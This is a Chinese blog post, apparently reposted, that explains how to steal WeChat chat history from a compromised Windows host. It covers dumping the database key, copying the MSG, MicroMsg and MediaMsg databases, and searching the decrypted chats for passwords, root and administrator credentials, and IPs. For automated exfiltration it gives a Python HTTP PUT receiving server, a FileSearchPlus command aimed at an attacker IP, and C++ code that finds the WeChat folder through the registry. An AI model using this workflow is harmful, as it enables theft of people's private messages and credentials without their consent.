手动

https://github.com/Ormicron/Sharp-dumpkey

2、下载目标聊天数据库文件，默认保存目录在以下目录，超出240MB会自动生成MSG1.db，以此类推。

 c:\User\xxxx\Documents\Wechat Files\ wxid_xxxxx\Msg\Multi

wxid_xxxxxxxx\Msg\Multi\MSG0.db > 聊天记录wxid_xxxxxxxx\Msg\Multi\MSG1.db > 聊天记录wxid_xxxxxxxx\Msg\Multi\MSG2.db > 聊天记录wxid_xxxxxxxx\Msg\MicroMsg.db > Contact字段 > 好友列表wxid_xxxxxxxx\Msg\MediaMsg.db > 语音 > 格式为silk

3.将上面三个文件回传到同目录，配合ChatViewTool打开解密即可查看，在搜索处“administrator” “root” “密码” “ip等”，项目地址。

https://github.com/Ormicron/chatViewTool

自动化

https://github.com/c1y2m3/FileSearch

服务端接收文件

https://floatingoctothorpe.uk/2017/receiving-files-over-http-with-python.html

#!/usr/bin/env python
"""Extend Python's built in HTTP server to save files"""import osimport loggingimport systry:    import http.server as serverexcept ImportError:    # Handle Python 2.x    import SimpleHTTPServer as server
log_path = 'run_server_logs.log'logging.basicConfig(level=logging.INFO,format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_path)class HTTPRequestHandler(server.SimpleHTTPRequestHandler):
    def do_GET(self):        self.send_response(404)        self.wfile.write("404 Not Found")
    """Extend SimpleHTTPRequestHandler to handle PUT requests"""    def do_PUT(self):        """Save a file following a HTTP PUT request"""        filename = os.path.basename(self.path)
        # Don't overwrite files        if os.path.exists(filename):            self.send_response(409, 'Conflict')            self.end_headers()            reply_body = '"%s" already exists\n' % filename            self.wfile.write(reply_body.encode('utf-8'))            return
        file_length = int(self.headers['Content-Length'])        output_file = 'tmp.txt'        with open(filename, 'wb') as output_file:            output_file.write(self.rfile.read(file_length))        self.send_response(201, 'Created')        self.end_headers()        reply_body = 'Saved "%s"\n' % filename        logging.info(self.headers)        self.wfile.write(reply_body.encode('utf-8'))
if __name__ == '__main__':    if sys.argv[2:]:        os.chdir(sys.argv[2])    server.test(HandlerClass=HTTPRequestHandler)

FileSearchPlus.exe default xxx.xxx.xxx.xxx

改进

void getPath(char *dbpath){  char cmd_command[256] = { 0 };  char regname[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";  HKEY hKey;  DWORD dwType = REG_BINARY;  REGSAM mode = KEY_READ;  DWORD length = 256;  int ret = RegOpenKey(HKEY_CURRENT_USER, regname, &hKey);
  ret = RegQueryValueEx(hKey, "Personal", 0, &dwType, (LPBYTE)dbpath, &length);  strcat(dbpath, "\\WeChat Files");  //cout << dbpath << endl;
  if (ret == 0) {    RegCloseKey(hKey);  }  else {    printf("failed to open regedit.%d\n", ret);  }}

void getFileNames(string path, vector<string>& files){  intptr_t hFile = 0;  //文件信息  struct _finddata_t fileinfo;  string p;  string::size_type idx;
  if ((hFile = _findfirst(p.assign(path).append("\\*").c_str(), &fileinfo)) != -1)  {    do    {      //如果是目录,匹配文件夹      if ((fileinfo.attrib & _A_SUBDIR))      {        if (strstr(fileinfo.name, "wxid") != NULL)          files.push_back(p.assign(path).append("\\").append(fileinfo.name));      }
    } while (_findnext(hFile, &fileinfo) == 0);    _findclose(hFile);  }}

https://github.com/Ormicron/Sharp-dumpkey

文章来源：c1y2m3博客原文地址：https://c1y2m3.github.io/2022/10/14/微信聊天记录之自动化回传/

关 注 有 礼